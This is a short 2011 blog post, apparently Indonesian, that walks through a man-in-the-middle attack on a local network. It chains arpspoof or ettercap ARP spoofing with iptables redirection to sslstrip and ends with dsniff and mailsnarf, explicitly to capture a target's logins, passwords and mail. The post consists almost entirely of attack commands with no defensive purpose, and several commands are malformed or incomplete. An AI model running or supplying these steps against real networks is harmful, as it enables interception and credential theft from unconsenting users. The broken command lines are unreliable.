25/02/2011

Tutorial Linux "Remote Victim"

Running sslstrip
* Flip your machine into forwarding mode.(echo "1" > /proc/sys/net/ipv4/ip_forward)
* Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
http://l0t3k.org/security/tools/loganalysis/
* Run sslstrip. (sslstrip.py -l )
* Run arpspoof (arpspoof -i -t )
* G;Gateway , V;Victim (target)
WARN ! before running Arpspoof, start #fragrouter -B1, ip forwading

=========ettercap,arpspoof,sslstrip=================================================
Setup iptables (Linux) to intercept HTTP requests (as root):nano /etc/etter.conf
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #8080
1# set ip-forward
2# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT to-port 1000
3# arpspoof -i wlan0 -t ipGW ipVc
4# pyton sslstrip.py -l 1000 (new-termnal)
5# ettercap -Tq -i wlan0 (new-termnal) ...waiting login your target...

Just specify a log file in sslstrip and use the post command.
sslstrip -p -k -w /home/user/ssl.log
~/Desktop/sslstrip-0.2/sslstrip.log
_____________________________________________________________________________________
====================================ettercap=========================================
edited /etc/etter.conf
remote-browser = "firefox -remote openurl (http://%host%url)"
To start the attack:
# set IP_Forward
# iptables -t nat -A PREROUTING -wlan0 -p tcp --dport 80 -j REDIRECT to-port 8080 [2]
# ettercap -i wlan0 -TqM ARP:REMOTE /victim/ /GW/ [3]
# hit -h- aktifkan PLUGIN REMOTE BROWSER ....binggo..
or
# ettercap -T -Q -M arp:remote -i eth1 /client-ip/ // -P remote_browser

OPtions
[2]# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT to-port 1000
[3]# ettercap -Tq -i wlan0 -M arp:remote,oneway /victim/ //
______________________________________________________________________________________
======================dsniff==========================================================
Run sslstrip with the command-line options you'd like.
python sslstrip.py -k -p -l

exp: arpspoof -i interface gateway(arpspoof -i wlan0 10.1.1.1)

T1 arpspoof -i wlan0 -t [G] [V] &
T2 arpspoof -i wlan0 -t [V] [G] &
T3 fragrouter -B1 (normal ip forwading)

$ dsniff -i wlan0 -w output.txt
$ mailsnarf -i wlan0
$ dsniff -i wlan0 -md
$ dsniff -i wlan0 -n -c
==================================================================================
arpspoof -t G V & >/dev/null
arpspoof -t V G & >/dev/null
#The "& >/dev/nul" part is there to make it easier to run from one terminal
RUN $ dsniff
As Dsniff finds passwords and usernames it will print them to the screen. To look at all sorts of other traffic I would recommend TCPDump or Wireshark.
__________________________________________________________________________________
and all process with # killall arpspoof

Dari berbagai sumber

1 comments:

Anonymous said...

saya suka perintah ini >> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT to-port 1000 ... hehehehe